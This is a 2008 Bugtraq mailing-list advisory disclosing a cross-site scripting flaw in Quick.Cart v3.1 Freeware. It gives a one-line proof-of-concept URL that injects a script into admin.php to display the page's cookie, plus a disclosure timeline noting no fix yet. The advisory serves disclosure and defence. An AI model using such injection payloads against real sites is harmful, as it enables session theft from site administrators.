[<prev] [next>] [day] [month] [year] [list]
Message-ID: <0A71BA7FDEB542C4A2DEF5682ECA3CD2@techiese645ed2>
Date: Tue, 16 Sep 2008 22:13:20 +0100
From: "John Cobb" <johnc@...ytes.com>
To: <bugtraq@...urityfocus.com>
Subject: [NOBYTES.COM: #13] Quick.Cart v3.1 Freeware - Cross Site Scripting
Application: Quick.Cart v3.1 Freeware
Authors Site: http://opensolution.org/quick.cart,en,9.html
+--------------------------------------------------------------+
XSS:
http://www.victim.com/admin.php?"><script>alert(document.cookie)</script><"
+-[Notes:]-----------------------------------------------------+
This only appears to work on Internet Explorer.
Vulnerabilities found on: 05/09/2008
Author(s) Informed on: 06/09/2008
Author(s) Response: 08/09/2008
Author(s) Fix: None Yet
JohnC@...ytes.com
http://www.NoBytes.com
Powered by blists - more mailing lists